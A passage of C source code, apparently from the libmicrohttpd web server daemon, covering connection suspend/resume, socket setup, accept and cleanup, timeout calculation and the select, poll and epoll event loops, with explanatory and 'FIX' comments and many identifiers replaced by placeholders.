* resume all connections before stopping the daemon.
*
* @param connection the connection to suspend
*/
void
<API key> (struct MHD_Connection *connection)
{
  struct MHD_Daemon *daemon;

  daemon = connection->daemon;
  /* suspending requires the (redacted) suspend/resume daemon option */
  if (<API key> != (daemon->options & <API key>))
    MHD_PANIC ("Cannot suspend connections without enabling <API key>!\n");
  if ( (0 != (daemon->options & <API key>)) &&
       (MHD_YES != MHD_mutex_lock_ (&daemon-><API key>)) )
    MHD_PANIC ("Failed to acquire cleanup mutex\n");
  /* move from the active list to the suspended list */
  DLL_remove (daemon->connections_head,
              daemon->connections_tail,
              connection);
  DLL_insert (daemon-><API key>,
              daemon-><API key>,
              connection);
  /* remove from whichever timeout list the connection is on, so a
     suspended connection cannot time out */
  if (connection->connection_timeout == daemon->connection_timeout)
    XDLL_remove (daemon->normal_timeout_head,
                 daemon->normal_timeout_tail,
                 connection);
  else
    XDLL_remove (daemon->manual_timeout_head,
                 daemon->manual_timeout_tail,
                 connection);
#if EPOLL_SUPPORT
  if (0 != (daemon->options & <API key>))
    {
      /* drop from the epoll "ready" list, if queued there */
      if (0 != (connection->epoll_state & <API key>))
        {
          EDLL_remove (daemon->eready_head,
                       daemon->eready_tail,
                       connection);
          connection->epoll_state &= ~<API key>;
        }
      /* unregister the FD from the epoll set while suspended */
      if (0 != (connection->epoll_state & <API key>))
        {
          if (0 != epoll_ctl (daemon->epoll_fd,
                              EPOLL_CTL_DEL,
                              connection->socket_fd,
                              NULL))
            MHD_PANIC ("Failed to remove FD from epoll set\n");
          connection->epoll_state &= ~<API key>;
        }
      connection->epoll_state |= <API key>;
    }
#endif
  connection->suspended = MHD_YES;
  if ( (0 != (daemon->options & <API key>)) &&
       (MHD_YES != MHD_mutex_unlock_ (&daemon-><API key>)) )
    MHD_PANIC ("Failed to release cleanup mutex\n");
}
/**
* Resume handling of network data for suspended connection. It is
* safe to resume a suspended connection at any time. Calling this function
* on a connection that was not previously suspended will result
* in undefined behavior.
*
* @param connection the connection to resume
*/
void
<API key> (struct MHD_Connection *connection)
{
  struct MHD_Daemon *daemon;

  daemon = connection->daemon;
  if (<API key> != (daemon->options & <API key>))
    MHD_PANIC ("Cannot resume connections without enabling <API key>!\n");
  if ( (0 != (daemon->options & <API key>)) &&
       (MHD_YES != MHD_mutex_lock_ (&daemon-><API key>)) )
    MHD_PANIC ("Failed to acquire cleanup mutex\n");
  /* only mark for resumption here; the actual list moves happen later
     on the event-loop thread (see the resume-suspended helper) */
  connection->resuming = MHD_YES;
  daemon->resuming = MHD_YES;
  /* wake the event loop via the pipe so the resume is processed promptly */
  if ( (MHD_INVALID_PIPE_ != daemon->wpipe[1]) &&
       (1 != MHD_pipe_write_ (daemon->wpipe[1], "r", 1)) )
    {
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "failed to signal resume via pipe");
#endif
    }
  if ( (0 != (daemon->options & <API key>)) &&
       (MHD_YES != MHD_mutex_unlock_ (&daemon-><API key>)) )
    MHD_PANIC ("Failed to release cleanup mutex\n");
}
/**
* Run through the suspended connections and move any that are no
* longer suspended back to the active state.
*
* @param daemon daemon context
*/
static void
<API key> (struct MHD_Daemon *daemon)
{
  struct MHD_Connection *pos;
  struct MHD_Connection *next = NULL;

  if ( (0 != (daemon->options & <API key>)) &&
       (MHD_YES != MHD_mutex_lock_ (&daemon-><API key>)) )
    MHD_PANIC ("Failed to acquire cleanup mutex\n");
  /* only walk the suspended list if something was actually marked */
  if (MHD_YES == daemon->resuming)
    next = daemon-><API key>;
  while (NULL != (pos = next))
    {
      /* capture 'next' before unlinking 'pos' from the list */
      next = pos->next;
      if (MHD_NO == pos->resuming)
        continue;
      /* move back from the suspended list to the active list */
      DLL_remove (daemon-><API key>,
                  daemon-><API key>,
                  pos);
      DLL_insert (daemon->connections_head,
                  daemon->connections_tail,
                  pos);
      /* re-enter the appropriate timeout list (timeouts restart now) */
      if (pos->connection_timeout == daemon->connection_timeout)
        XDLL_insert (daemon->normal_timeout_head,
                     daemon->normal_timeout_tail,
                     pos);
      else
        XDLL_insert (daemon->manual_timeout_head,
                     daemon->manual_timeout_tail,
                     pos);
#if EPOLL_SUPPORT
      if (0 != (daemon->options & <API key>))
        {
          if (0 != (pos->epoll_state & <API key>))
            MHD_PANIC ("Resumed connection was already in EREADY set\n");
          /* we always mark resumed connections as ready, as we
             might have missed the edge poll event during suspension */
          EDLL_insert (daemon->eready_head,
                       daemon->eready_tail,
                       pos);
          pos->epoll_state |= <API key>;
          pos->epoll_state &= ~<API key>;
        }
#endif
      pos->suspended = MHD_NO;
      pos->resuming = MHD_NO;
    }
  daemon->resuming = MHD_NO;
  if ( (0 != (daemon->options & <API key>)) &&
       (MHD_YES != MHD_mutex_unlock_ (&daemon-><API key>)) )
    MHD_PANIC ("Failed to release cleanup mutex\n");
}
/**
* Change socket options to be non-blocking, non-inheritable.
*
* @param daemon daemon context
* @param sock socket to manipulate
*/
static void
<API key> (struct MHD_Daemon *daemon,
           MHD_socket sock)
{
#ifdef WINDOWS
  DWORD dwFlags;
  unsigned long flags = 1;

  /* non-blocking via FIONBIO */
  if (0 != ioctlsocket (sock, FIONBIO, &flags))
    {
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Failed to make socket non-blocking: %s\n",
                <API key> ());
#endif
    }
  /* non-inheritable: clear HANDLE_FLAG_INHERIT on the socket handle */
  if (!<API key> ((HANDLE) sock, &dwFlags) ||
      ((dwFlags != (dwFlags & ~HANDLE_FLAG_INHERIT)) &&
       !<API key> ((HANDLE) sock, HANDLE_FLAG_INHERIT, 0)))
    {
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Failed to make socket non-inheritable: %u\n",
                (unsigned int) GetLastError ());
#endif
    }
#else
  int flags;
  int nonblock;

  nonblock = O_NONBLOCK;
#ifdef CYGWIN
  /* on CYGWIN, non-blocking sockets cause problems unless TLS is used */
  if (0 == (daemon->options & MHD_USE_SSL))
    nonblock = 0;
#endif
  /* FIX: O_NONBLOCK is a file-STATUS flag (F_GETFL/F_SETFL) while
     FD_CLOEXEC is a file-DESCRIPTOR flag (F_GETFD/F_SETFD).  The old code
     OR-ed O_NONBLOCK into the F_SETFD call, where the kernel silently
     ignores it, so the socket never became non-blocking.  Set each flag
     through its proper fcntl command. */
  flags = fcntl (sock, F_GETFL);
  if ( (-1 == flags) ||
       ( (0 != nonblock) &&
         (flags != (flags | nonblock)) &&
         (0 != fcntl (sock, F_SETFL, flags | nonblock)) ) )
    {
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Failed to make socket non-blocking: %s\n",
                <API key> ());
#endif
    }
  flags = fcntl (sock, F_GETFD);
  if ( (-1 == flags) ||
       ( (flags != (flags | FD_CLOEXEC)) &&
         (0 != fcntl (sock, F_SETFD, flags | FD_CLOEXEC)) ) )
    {
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Failed to make socket non-inheritable: %s\n",
                <API key> ());
#endif
    }
#endif
}
/**
* Add another client connection to the set of connections managed by
* MHD. This API is usually not needed (since MHD will accept inbound
* connections on the server socket). Use this API in special cases,
* for example if your HTTP server is behind NAT and needs to connect
* out to the HTTP client, or if you are building a proxy.
*
* If you use this API in conjunction with a internal select or a
* thread pool, you must set the option
* #<API key> to ensure that the freshly added
* connection is immediately processed by MHD.
*
* The given client socket will be managed (and closed!) by MHD after
* this call and must no longer be used directly by the application
* afterwards.
*
* Per-IP connection limits are ignored when using this API.
*
* @param daemon daemon that manages the connection
* @param client_socket socket to manage (MHD will expect
* to receive an HTTP request from this socket next).
* @param addr IP address of the client
* @param addrlen number of bytes in @a addr
* @return #MHD_YES on success, #MHD_NO if this daemon could
* not handle the connection (i.e. `malloc()` failed, etc).
* The socket will be closed in any case; `errno` is
* set to indicate further details about the error.
* @ingroup specialized
*/
int
MHD_add_connection (struct MHD_Daemon *daemon,
                    MHD_socket client_socket,
                    const struct sockaddr *addr,
                    socklen_t addrlen)
{
  /* normalize the externally supplied socket (presumably making it
     non-blocking / non-inheritable; redacted helper) before handing it
     to the internal add-connection routine with external_add=MHD_YES */
  <API key> (daemon,
             client_socket);
  return <API key> (daemon,
                    client_socket,
                    addr, addrlen,
                    MHD_YES);
}
/**
* Accept an incoming connection and create the MHD_Connection object for
* it. This function also enforces policy by way of checking with the
* accept policy callback.
*
* @param daemon handle with the listen socket
* @return MHD_YES on success (connections denied by policy or due
* to 'out of memory' and similar errors) are still considered
* successful as far as <API key> is concerned);
* a return code of MHD_NO only refers to the actual
* 'accept' system call.
*/
static int
<API key> (struct MHD_Daemon *daemon)
{
#if HAVE_INET6
  struct sockaddr_in6 addrstorage;
#else
  struct sockaddr_in addrstorage;
#endif
  struct sockaddr *addr = (struct sockaddr *) &addrstorage;
  socklen_t addrlen;
  MHD_socket s;
  MHD_socket fd;
  int nonblock;

  addrlen = sizeof (addrstorage);
  memset (addr, 0, sizeof (addrstorage));
  /* listen socket may be gone if the daemon is shutting down */
  if (MHD_INVALID_SOCKET == (fd = daemon->socket_fd))
    return MHD_NO;
#ifdef HAVE_SOCK_NONBLOCK
  nonblock = SOCK_NONBLOCK;
#else
  nonblock = 0;
#endif
#ifdef CYGWIN
  /* on CYGWIN, non-blocking sockets cause problems unless TLS is used */
  if (0 == (daemon->options & MHD_USE_SSL))
    nonblock = 0;
#endif
#if HAVE_ACCEPT4
  /* atomically set close-on-exec (and possibly non-blocking) at accept */
  s = accept4 (fd, addr, &addrlen, SOCK_CLOEXEC | nonblock);
#else
  /* dummy use of 'nonblock' — presumably to silence an unused-variable
     warning; 's = 0' is dead since nonblock is 0 here */
  nonblock = 0; if (nonblock) s = 0;
  s = accept (fd, addr, &addrlen);
#endif
  if ((MHD_INVALID_SOCKET == s) || (addrlen <= 0))
    {
#if HAVE_MESSAGES
      const int err = MHD_socket_errno_;
      /* This could be a common occurance with multiple worker threads */
      if ((EAGAIN != err) && (EWOULDBLOCK != err))
        MHD_DLOG (daemon,
                  "Error accepting connection: %s\n",
                  <API key> ());
#endif
      if (MHD_INVALID_SOCKET != s)
        {
          if (0 != MHD_socket_close_ (s))
            MHD_PANIC ("close failed\n");
          /* just in case */
        }
      return MHD_NO;
    }
  /* if accept4() could not set the flags atomically, fix them up now
     via the (redacted) non-blocking/non-inheritable helper */
#if !defined(HAVE_ACCEPT4) || HAVE_ACCEPT4+0 == 0 || !defined(HAVE_SOCK_NONBLOCK) || SOCK_CLOEXEC+0 == 0
  <API key> (daemon, s);
#endif
#if HAVE_MESSAGES
#if DEBUG_CONNECT
  MHD_DLOG (daemon,
            "Accepted connection on socket %d\n",
            s);
#endif
#endif
  /* per the contract above, failures inside the internal add are still
     reported as MHD_YES here (only the accept() itself can yield MHD_NO) */
  (void) <API key> (daemon, s,
                    addr, addrlen,
                    MHD_NO);
  return MHD_YES;
}
/**
* Free resources associated with all closed connections.
* (destroy responses, free buffers, etc.). All closed
* connections are kept in the "cleanup" doubly-linked list.
*
* @param daemon daemon to clean up
*/
static void
<API key> (struct MHD_Daemon *daemon)
{
  struct MHD_Connection *pos;

  if ( (0 != (daemon->options & <API key>)) &&
       (MHD_YES != MHD_mutex_lock_ (&daemon-><API key>)) )
    MHD_PANIC ("Failed to acquire cleanup mutex\n");
  /* drain the cleanup list, releasing every resource each closed
     connection still holds */
  while (NULL != (pos = daemon->cleanup_head))
    {
      DLL_remove (daemon->cleanup_head,
                  daemon->cleanup_tail,
                  pos);
      /* thread-per-connection: reap the handler thread if not yet joined */
      if ( (0 != (daemon->options & <API key>)) &&
           (MHD_NO == pos->thread_joined) )
        {
          if (0 != MHD_join_thread_ (pos->pid))
            {
              MHD_PANIC ("Failed to join a thread\n");
            }
        }
      MHD_pool_destroy (pos->pool);
#if HTTPS_SUPPORT
      if (pos->tls_session != NULL)
        gnutls_deinit (pos->tls_session);
#endif
      /* release this connection's slot in the per-IP accounting */
      MHD_ip_limit_del (daemon,
                        (struct sockaddr *) pos->addr,
                        pos->addr_len);
#if EPOLL_SUPPORT
      if (0 != (pos->epoll_state & <API key>))
        {
          EDLL_remove (daemon->eready_head,
                       daemon->eready_tail,
                       pos);
          pos->epoll_state &= ~<API key>;
        }
      if ( (0 != (daemon->options & <API key>)) &&
           (MHD_INVALID_SOCKET != daemon->epoll_fd) &&
           (0 != (pos->epoll_state & <API key>)) )
        {
          if (0 != epoll_ctl (daemon->epoll_fd,
                              EPOLL_CTL_DEL,
                              pos->socket_fd,
                              NULL))
            MHD_PANIC ("Failed to remove FD from epoll set\n");
          pos->epoll_state &= ~<API key>;
        }
#endif
      if (NULL != pos->response)
        {
          <API key> (pos->response);
          pos->response = NULL;
        }
      if (MHD_INVALID_SOCKET != pos->socket_fd)
        {
          if (0 != MHD_socket_close_ (pos->socket_fd))
            MHD_PANIC ("close failed\n");
        }
      if (NULL != pos->addr)
        free (pos->addr);
      free (pos);
      /* FIX: statement was truncated to 'daemon->connections' (no
         decrement operator, no semicolon) — a syntax error that also
         left the connection count never decreasing; restore it. */
      daemon->connections--;
    }
  if ( (0 != (daemon->options & <API key>)) &&
       (MHD_YES != MHD_mutex_unlock_ (&daemon-><API key>)) )
    MHD_PANIC ("Failed to release cleanup mutex\n");
}
/**
* Obtain timeout value for `select()` for this daemon (only needed if
* connection timeout is used). The returned value is how long
* `select()` or `poll()` should at most block, not the timeout value set
* for connections. This function MUST NOT be called if MHD is
* running with #<API key>.
*
* @param daemon daemon to query for timeout
* @param timeout set to the timeout (in milliseconds)
* @return #MHD_YES on success, #MHD_NO if timeouts are
* not used (or no connections exist that would
* necessiate the use of a timeout right now).
* @ingroup event
*/
int
MHD_get_timeout (struct MHD_Daemon *daemon,
                 <API key> *timeout)
{
  time_t earliest_deadline;
  time_t now;
  struct MHD_Connection *pos;
  int have_timeout;

  /* invalid in thread-per-connection mode: no shared event loop exists */
  if (0 != (daemon->options & <API key>))
    {
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Illegal call to MHD_get_timeout\n");
#endif
      return MHD_NO;
    }
#if HTTPS_SUPPORT
  if (0 != daemon->num_tls_read_ready)
    {
      /* if there is any TLS connection with data ready for
         reading, we must not block in the event loop */
      *timeout = 0;
      return MHD_YES;
    }
#endif
  have_timeout = MHD_NO;
  earliest_deadline = 0; /* avoid compiler warnings */
  /* manual-timeout connections are unsorted: scan them all
     (XDLL list, hence 'nextX') */
  for (pos = daemon->manual_timeout_head; NULL != pos; pos = pos->nextX)
    {
      if (0 != pos->connection_timeout)
        {
          /* FIX: 'time_t(...)' is C++ function-style cast syntax and does
             not compile as C; use a C-style cast. */
          if ( (! have_timeout) ||
               (earliest_deadline > (time_t) (pos->last_activity + pos->connection_timeout)) )
            earliest_deadline = pos->last_activity + pos->connection_timeout;
#if HTTPS_SUPPORT
          /* pending TLS data means we must not block at all */
          if ( (0 != (daemon->options & MHD_USE_SSL)) &&
               (0 != <API key> (pos->tls_session)) )
            earliest_deadline = 0;
#endif
          have_timeout = MHD_YES;
        }
    }
  /* normal timeouts are sorted, so we only need to look at the 'head' */
  pos = daemon->normal_timeout_head;
  if ( (NULL != pos) &&
       (0 != pos->connection_timeout) )
    {
      /* FIX: same C++-style cast corrected here */
      if ( (! have_timeout) ||
           (earliest_deadline > (time_t) (pos->last_activity + pos->connection_timeout)) )
        earliest_deadline = pos->last_activity + pos->connection_timeout;
#if HTTPS_SUPPORT
      if ( (0 != (daemon->options & MHD_USE_SSL)) &&
           (0 != <API key> (pos->tls_session)) )
        earliest_deadline = 0;
#endif
      have_timeout = MHD_YES;
    }
  if (MHD_NO == have_timeout)
    return MHD_NO;
  now = MHD_monotonic_time();
  if (earliest_deadline < now)
    *timeout = 0;
  else
    /* report in milliseconds; +1 second rounds up so we never wake early */
    *timeout = 1000 * (1 + earliest_deadline - now);
  return MHD_YES;
}
/**
 * Run webserver operations. This method should be called by clients
 * in combination with #MHD_get_fdset if the client-controlled select
 * method is used.
 *
 * You can use this function instead of #MHD_run if you called
 * `select()` on the result from #MHD_get_fdset.  File descriptors in
 * the sets that are not controlled by MHD will be ignored.  Calling
 * this function instead of #MHD_run is more efficient as MHD will
 * not have to call `select()` again to determine which operations are
 * ready.
 *
 * @param daemon daemon to run select loop for
 * @param read_fd_set read set
 * @param write_fd_set write set
 * @param except_fd_set except set (not used, can be NULL)
 * @return #MHD_NO on serious errors, #MHD_YES on success
 * @ingroup event
 */
int
MHD_run_from_select (struct MHD_Daemon *daemon,
                     const fd_set *read_fd_set,
                     const fd_set *write_fd_set,
                     const fd_set * /*except_fd_set*/)
{
  MHD_socket ds;
  char tmp;
  struct MHD_Connection *pos;
  struct MHD_Connection *next;

#if EPOLL_SUPPORT
  if (0 != (daemon->options & <API key>))
    {
      /* we're in epoll mode, the epoll FD stands for
         the entire event set! */
      if (daemon->epoll_fd >= FD_SETSIZE)
        return MHD_NO; /* poll fd too big, fail hard */
      if (FD_ISSET (daemon->epoll_fd, read_fd_set))
        return MHD_run (daemon);
      return MHD_YES;
    }
#endif
  /* select connection thread handling type */
  if ( (MHD_INVALID_SOCKET != (ds = daemon->socket_fd)) &&
       (FD_ISSET (ds, read_fd_set)) )
    (void) <API key> (daemon);
  /* drain signaling pipe to avoid spinning select */
  if ( (MHD_INVALID_PIPE_ != daemon->wpipe[0]) &&
       (FD_ISSET (daemon->wpipe[0], read_fd_set)) )
    (void)! MHD_pipe_read_ (daemon->wpipe[0], &tmp, sizeof (tmp));
  if (0 == (daemon->options & <API key>))
    {
      /* do not have a thread per connection, process all connections now */
      next = daemon->connections_head;
      while (NULL != (pos = next))
        {
          /* advance first: handlers may remove 'pos' from the list */
          next = pos->next;
          ds = pos->socket_fd;
          if (MHD_INVALID_SOCKET == ds)
            continue;
          switch (pos->event_loop_info)
            {
            case <API key>:
              /* readable on the socket, or TLS layer has buffered data */
              if ( (FD_ISSET (ds, read_fd_set))
#if HTTPS_SUPPORT
                   || (MHD_YES == pos->tls_read_ready)
#endif
                   )
                pos->read_handler (pos);
              break;
            case <API key>:
              if ( (FD_ISSET (ds, read_fd_set)) &&
                   (pos->read_buffer_size > pos->read_buffer_offset) )
                pos->read_handler (pos);
              if (FD_ISSET (ds, write_fd_set))
                pos->write_handler (pos);
              break;
            case <API key>:
              if ( (FD_ISSET (ds, read_fd_set)) &&
                   (pos->read_buffer_size > pos->read_buffer_offset) )
                pos->read_handler (pos);
              break;
            case <API key>:
              /* should never happen */
              break;
            }
          /* always give the connection a chance to advance its state */
          pos->idle_handler (pos);
        }
    }
  <API key> (daemon);
  return MHD_YES;
}
/**
 * Main internal select() call.  Will compute select sets, call select()
 * and then #MHD_run_from_select with the result.
 *
 * @param daemon daemon to run select() loop for
 * @param may_block #MHD_YES if blocking, #MHD_NO if non-blocking
 * @return #MHD_NO on serious errors, #MHD_YES on success
 */
static int
MHD_select (struct MHD_Daemon *daemon,
            int may_block)
{
  int num_ready;
  fd_set rs;
  fd_set ws;
  fd_set es;
  MHD_socket max;
  struct timeval timeout;
  struct timeval *tv;
  <API key> ltimeout;

  timeout.tv_sec = 0;
  timeout.tv_usec = 0;
  if (MHD_YES == daemon->shutdown)
    return MHD_NO;
  FD_ZERO (&rs);
  FD_ZERO (&ws);
  FD_ZERO (&es);
  max = MHD_INVALID_SOCKET;
  bool at_connection_limit = daemon->connections == daemon->connection_limit; // Do not accept when at connection limit, by Milan Straka
  if (0 == (daemon->options & <API key>))
    {
      if (<API key> == (daemon->options & <API key>))
        <API key> (daemon);
      /* single-threaded, go over everything */
      if (MHD_NO == MHD_get_fdset2 (daemon, &rs, &ws, &es, &max, FD_SETSIZE))
        return MHD_NO;
      /* If we're at the connection limit, no need to
         accept new connections. */
      if ( at_connection_limit &&
           (MHD_INVALID_SOCKET != daemon->socket_fd) )
        FD_CLR (daemon->socket_fd, &rs);
    }
  else
    {
      /* accept only, have one thread per connection */
      if (!at_connection_limit)
        if (MHD_INVALID_SOCKET != daemon->socket_fd &&
            MHD_YES != add_to_fd_set(daemon->socket_fd, &rs, &max, FD_SETSIZE))
          return MHD_NO;
    }
  /* always watch the shutdown/wakeup pipe */
  if (MHD_INVALID_PIPE_ != daemon->wpipe[0] &&
      MHD_YES != add_to_fd_set(daemon->wpipe[0], &rs, &max, FD_SETSIZE))
    return MHD_NO;
  tv = NULL;
  if (MHD_NO == may_block)
    {
      /* non-blocking mode: poll with a zero timeout */
      timeout.tv_usec = 0;
      timeout.tv_sec = 0;
      tv = &timeout;
    }
  else if ( (0 == (daemon->options & <API key>)) &&
            (MHD_YES == MHD_get_timeout (daemon, &ltimeout)) )
    {
      /* ltimeout is in ms */
      timeout.tv_usec = (ltimeout % 1000) * 1000;
      timeout.tv_sec = ltimeout / 1000;
      tv = &timeout;
    }
  else if ( (0 != (daemon->options & <API key>)) && at_connection_limit)
    {
      // We are ignoring the listening socket because of reaching connection limit, by Milan Straka
      timeout.tv_usec = 5000;
      timeout.tv_sec = 0;
      tv = &timeout;
    }
  if (MHD_INVALID_SOCKET == max)
    return MHD_YES; /* nothing to watch at all */
  num_ready = MHD_SYS_select_ (max + 1, &rs, &ws, &es, tv);
  if (MHD_YES == daemon->shutdown)
    return MHD_NO;
  if (num_ready < 0)
    {
      if (EINTR == MHD_socket_errno_)
        return MHD_YES; /* interrupted by a signal: benign, retry later */
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "select failed: %s\n",
                <API key> ());
#endif
      return MHD_NO;
    }
  return MHD_run_from_select (daemon, &rs, &ws, &es);
}
#ifdef HAVE_POLL_H
/**
 * Process all of our connections and possibly the server
 * socket using poll().
 *
 * @param daemon daemon to run poll loop for
 * @param may_block #MHD_YES if blocking, #MHD_NO if non-blocking
 * @return #MHD_NO on serious errors, #MHD_YES on success
 */
static int
MHD_poll_all (struct MHD_Daemon *daemon,
              int may_block)
{
  unsigned int num_connections;
  struct MHD_Connection *pos;
  struct MHD_Connection *next;

  if (<API key> == (daemon->options & <API key>))
    <API key> (daemon);
  /* count number of connections and thus determine poll set size */
  num_connections = 0;
  for (pos = daemon->connections_head; NULL != pos; pos = pos->next)
    num_connections++;
  {
    /* +2: one slot for the listen socket, one for the wakeup pipe */
    struct pollfd p[2 + num_connections];
    <API key> ltimeout;
    unsigned int i;
    int timeout;
    unsigned int poll_server;
    int poll_listen;

    memset (p, 0, sizeof (p));
    poll_server = 0;
    poll_listen = -1;
    if ( (MHD_INVALID_SOCKET != daemon->socket_fd) &&
         (daemon->connections < daemon->connection_limit) )
      {
        /* only listen if we are not at the connection limit */
        p[poll_server].fd = daemon->socket_fd;
        p[poll_server].events = POLLIN;
        p[poll_server].revents = 0;
        poll_listen = (int) poll_server;
        poll_server++;
      }
    if (MHD_INVALID_PIPE_ != daemon->wpipe[0])
      {
        p[poll_server].fd = daemon->wpipe[0];
        p[poll_server].events = POLLIN;
        p[poll_server].revents = 0;
        poll_server++;
      }
    if (may_block == MHD_NO)
      timeout = 0;
    else if ( (0 != (daemon->options & <API key>)) ||
              (MHD_YES != MHD_get_timeout (daemon, &ltimeout)) )
      timeout = -1; /* no timeout needed, block indefinitely */
    else
      timeout = (ltimeout > INT_MAX) ? INT_MAX : (int) ltimeout;
    /* fill one pollfd entry per connection, after the server slots */
    i = 0;
    for (pos = daemon->connections_head; NULL != pos; pos = pos->next)
      {
        p[poll_server+i].fd = pos->socket_fd;
        switch (pos->event_loop_info)
          {
          case <API key>:
            p[poll_server+i].events |= POLLIN;
            break;
          case <API key>:
            p[poll_server+i].events |= POLLOUT;
            if (pos->read_buffer_size > pos->read_buffer_offset)
              p[poll_server+i].events |= POLLIN;
            break;
          case <API key>:
            if (pos->read_buffer_size > pos->read_buffer_offset)
              p[poll_server+i].events |= POLLIN;
            break;
          case <API key>:
            /* should never happen */
            break;
          }
        i++;
      }
    if (0 == poll_server + num_connections)
      return MHD_YES;
    if (poll (p, poll_server + num_connections, timeout) < 0)
      {
        if (EINTR == MHD_socket_errno_)
          return MHD_YES;
#if HAVE_MESSAGES
        MHD_DLOG (daemon,
                  "poll failed: %s\n",
                  <API key> ());
#endif
        return MHD_NO;
      }
    /* handle shutdown */
    if (MHD_YES == daemon->shutdown)
      return MHD_NO;
    i = 0;
    next = daemon->connections_head;
    while (NULL != (pos = next))
      {
        /* advance first: handlers may unlink 'pos' */
        next = pos->next;
        switch (pos->event_loop_info)
          {
          case <API key>:
            /* first, sanity checks */
            if (i >= num_connections)
              break; /* connection list changed somehow, retry later ... */
            if (p[poll_server+i].fd != pos->socket_fd)
              break; /* fd mismatch, something else happened, retry later ... */
            /* normal handling */
            if (0 != (p[poll_server+i].revents & POLLIN))
              pos->read_handler (pos);
            pos->idle_handler (pos);
            i++;
            break;
          case <API key>:
            /* first, sanity checks */
            if (i >= num_connections)
              break; /* connection list changed somehow, retry later ... */
            if (p[poll_server+i].fd != pos->socket_fd)
              break; /* fd mismatch, something else happened, retry later ... */
            /* normal handling */
            if (0 != (p[poll_server+i].revents & POLLIN))
              pos->read_handler (pos);
            if (0 != (p[poll_server+i].revents & POLLOUT))
              pos->write_handler (pos);
            pos->idle_handler (pos);
            i++;
            break;
          case <API key>:
            if (0 != (p[poll_server+i].revents & POLLIN))
              pos->read_handler (pos);
            pos->idle_handler (pos);
            break;
          case <API key>:
            /* should never happen */
            pos->idle_handler (pos); // Add forgotten idle_handler, by Milan Straka.
            break;
          }
      }
    /* handle 'listen' FD */
    if ( (-1 != poll_listen) &&
         (0 != (p[poll_listen].revents & POLLIN)) )
      (void) <API key> (daemon);
  }
  return MHD_YES;
}
/**
 * Process only the listen socket using poll().
 * Used in thread-per-connection mode, where worker threads handle
 * the individual connections and this loop only accepts.
 *
 * @param daemon daemon to run poll loop for
 * @param may_block #MHD_YES if blocking, #MHD_NO if non-blocking
 * @return #MHD_NO on serious errors, #MHD_YES on success
 */
static int
<API key> (struct MHD_Daemon *daemon,
           int may_block)
{
  /* at most two FDs: listen socket + wakeup pipe */
  struct pollfd p[2];
  int timeout;
  unsigned int poll_count;
  int poll_listen;
  bool at_connection_limit = daemon->connections == daemon->connection_limit; // Do not accept when at connection limit, by Milan Straka

  memset (&p, 0, sizeof (p));
  poll_count = 0;
  poll_listen = -1;
  if (!at_connection_limit && MHD_INVALID_SOCKET != daemon->socket_fd)
    {
      p[poll_count].fd = daemon->socket_fd;
      p[poll_count].events = POLLIN;
      p[poll_count].revents = 0;
      poll_listen = poll_count;
      poll_count++;
    }
  if (MHD_INVALID_PIPE_ != daemon->wpipe[0])
    {
      p[poll_count].fd = daemon->wpipe[0];
      p[poll_count].events = POLLIN;
      p[poll_count].revents = 0;
      poll_count++;
    }
  if (MHD_NO == may_block)
    timeout = 0;
  else
    /* at the limit: wake up periodically (5ms) to re-check;
       otherwise block until something happens */
    timeout = at_connection_limit ? 5 : -1;
  if (0 == poll_count)
    return MHD_YES;
  if (poll (p, poll_count, timeout) < 0)
    {
      if (EINTR == MHD_socket_errno_)
        return MHD_YES; /* interrupted by signal: benign */
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "poll failed: %s\n",
                <API key> ());
#endif
      return MHD_NO;
    }
  /* handle shutdown */
  if (MHD_YES == daemon->shutdown)
    return MHD_NO;
  if ( (-1 != poll_listen) &&
       (0 != (p[poll_listen].revents & POLLIN)) )
    (void) <API key> (daemon);
  return MHD_YES;
}
#endif
/**
 * Do poll()-based processing.  Dispatches to the all-connections
 * variant or the listen-socket-only variant depending on whether
 * the daemon uses a thread per connection.
 *
 * @param daemon daemon to run poll()-loop for
 * @param may_block #MHD_YES if blocking, #MHD_NO if non-blocking
 * @return #MHD_NO on serious errors, #MHD_YES on success
 */
#ifdef HAVE_POLL_H
static int
MHD_poll (struct MHD_Daemon *daemon,
          int may_block)
{
  if (MHD_YES == daemon->shutdown)
    return MHD_NO;
  if (0 == (daemon->options & <API key>))
    return MHD_poll_all (daemon, may_block);
  else
    return <API key> (daemon, may_block);
}
#else
/* poll() unavailable on this platform: always fail */
static int
MHD_poll (struct MHD_Daemon * /*daemon*/,
          int /*may_block*/)
{
  return MHD_NO;
}
#endif
#if EPOLL_SUPPORT
#define MAX_EVENTS 128
/**
 * Do epoll()-based processing (this function is allowed to
 * block if @a may_block is set to #MHD_YES).
 *
 * @param daemon daemon to run poll loop for
 * @param may_block #MHD_YES if blocking, #MHD_NO if non-blocking
 * @return #MHD_NO on serious errors, #MHD_YES on success
 */
static int
MHD_epoll (struct MHD_Daemon *daemon,
           int may_block)
{
  struct MHD_Connection *pos;
  struct MHD_Connection *next;
  struct epoll_event events[MAX_EVENTS];
  struct epoll_event event;
  int timeout_ms;
  <API key> timeout_ll;
  int num_events;
  unsigned int i;
  unsigned int series_length;
  char tmp;

  if (-1 == daemon->epoll_fd)
    return MHD_NO; /* we're down! */
  if (MHD_YES == daemon->shutdown)
    return MHD_NO;
  /* (re-)register the listen socket with epoll while we are
     below the connection limit */
  if ( (MHD_INVALID_SOCKET != daemon->socket_fd) &&
       (daemon->connections < daemon->connection_limit) &&
       (MHD_NO == daemon-><API key>) )
    {
      event.events = EPOLLIN;
      event.data.ptr = daemon;
      if (0 != epoll_ctl (daemon->epoll_fd,
                          EPOLL_CTL_ADD,
                          daemon->socket_fd,
                          &event))
        {
#if HAVE_MESSAGES
          MHD_DLOG (daemon,
                    "Call to epoll_ctl failed: %s\n",
                    <API key> ());
#endif
          return MHD_NO;
        }
      daemon-><API key> = MHD_YES;
    }
  if ( (MHD_YES == daemon-><API key>) &&
       (daemon->connections == daemon->connection_limit) )
    {
      /* we're at the connection limit, disable listen socket
         for event loop for now */
      if (0 != epoll_ctl (daemon->epoll_fd,
                          EPOLL_CTL_DEL,
                          daemon->socket_fd,
                          NULL))
        MHD_PANIC ("Failed to remove listen FD from epoll set\n");
      daemon-><API key> = MHD_NO;
    }
